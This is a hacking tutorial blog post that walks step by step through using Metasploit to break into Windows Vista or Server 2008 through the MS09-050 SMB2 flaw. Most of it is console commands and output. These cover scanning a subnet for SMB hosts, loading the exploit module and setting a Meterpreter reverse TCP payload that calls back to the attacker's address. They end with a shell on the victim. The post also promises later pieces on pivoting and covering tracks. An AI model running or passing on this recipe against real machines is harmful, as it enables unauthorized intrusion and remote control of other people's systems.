How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities


Hi, gang! Time for another hack using Metasploit.

We have exploited Windows XP (a very insecure operating system) and we have exploited Ubuntu and installed Meterpreter on a Linux system exploiting the Samba service. Several of you have asked for a hack on more modern Windows systems, so here goes.

In this module, we hack into Windows Vista or Windows Server 2008 using a vulnerability in SMB2, the one Microsoft patched in MS09-050 (CVE-2009-3103). As you know, SMB2 is an application-layer protocol used to share files, folders and printers on Windows systems. SMB2 is Microsoft's revision of SMB; it was introduced in 2006 with Windows Vista and is also used in Windows Server 2008. Both SMB and SMB2 have been plagued with security vulnerabilities from the very beginning.

So let's get started. Boot up your Linux operating system, open a terminal, and load the Metasploit Framework.

Step 1: Scanning the Network for SMB2

Before we begin to exploit, we need to scan the network to find the hosts that speak SMB and learn which operating system and service pack each one runs. Metasploit has multiple auxiliary modules that help with the preliminary tasks of hacking, such as scanning the victim network to obtain this kind of information. In this case, we will use the auxiliary module scanner/smb/smb_version to scan the network.

msf > use scanner/smb/smb_version

Step 2: Seeing Our Options

Next, we need to see our options.

msf auxiliary(smb_version) > show options

Metasploit lists the options for this auxiliary module, showing for each one its current value, whether it is required, and a short description.

Step 3: Setting Our Options

Here we need to set RHOSTS (the targets) and THREADS (how many hosts to probe concurrently). We set RHOSTS to our targeted address range, in this case 192.168.1.0 through 192.168.1.255 (yours may be different depending upon your network; CIDR notation such as 192.168.1.0/24 also works).

msf auxiliary(smb_version) > set RHOSTS 192.168.1.0-192.168.1.255
RHOSTS => 192.168.1.0-192.168.1.255

We then set the number of concurrent threads to 50.

msf auxiliary(smb_version) > set THREADS 50
THREADS => 50

By typing show options again, we can confirm that Metasploit has set RHOSTS and THREADS as we defined them.

msf auxiliary(smb_version) > show options

If anything is still unset or mistyped, this is the place to catch it before launching the scan.

Step 4: Scanning for SMB2

Next, we need to run our SMB scan on the network.

msf auxiliary(smb_version) > run

The scan reports, for every host in the range that answers on TCP port 445, the operating system, the service pack, and the computer name. In my screenshot example, there is just one computer on the network, and the scan correctly identifies all three. What matters for the next step is the OS and service pack: the exploit we are about to use only works against Windows Vista and Windows Server 2008 (before R2) hosts that are missing the MS09-050 update. Windows 7 RTM and Server 2008 R2 shipped with the fix, so they are not affected no matter what the scan says about SMB2.

Step 5: Setting Up Our Exploit Module

Now that we know there is a Vista host on the network using SMB2, we can load the exploit module for MS09-050, ms09_050_smb2_negotiate_func_index.

msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index

To learn more about this exploit module, we can simply type info.

msf exploit(ms09_050_smb2_negotiate_func_index) > info

The info output gives the essential background on this exploit: the module description, its authors and references (MS09-050, CVE-2009-3103), the targets it supports, and the options it expects. In short, the module exploits an out-of-bounds function table dereference in the request validation code of srv2.sys, the kernel-mode SMB2 driver; read the description and the targets list before firing it.

Step 6: Setting Up Our Payload

Now we set our payload to a Windows Meterpreter reverse TCP shell, so the victim connects back to us once the exploit lands.

msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

We then need to set RHOST to the address of the Vista box we found in the scan:

msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 192.168.1.100
RHOST => 192.168.1.100

And LHOST, the address of our own machine, which the reverse connection will come back to:

msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.1.111
LHOST => 192.168.1.111

Step 7: Checking Our Payload Options

We need to check to make certain our options are set properly by typing show options.

msf exploit(ms09_050_smb2_negotiate_func_index) > show options


Step 8: Exploiting the Vista Box

Finally, we exploit SMB2 on the Vista system.

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit


Step 9: Using the Meterpreter

The Vista system then returns a Meterpreter prompt and we type sysinfo.

meterpreter > sysinfo

Computer: PUPEN-SNOWBLACK
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

We then type shell to get a shell on our victim system.

meterpreter > shell

You have now successfully hacked the Windows Vista box. If this hack doesn't work the first time, try again. Hacking is often a matter of probabilities and all hacks don't work all the time. One caveat: because this bug lives in a kernel driver, a failed attempt can blue-screen the target rather than simply fail, so only run it against machines you are authorized to test and be prepared for the box to reboot before you can retry.

Look for future how-to articles on using the Meterpreter to control the owned box, pivoting attacks from it, and covering your tracks.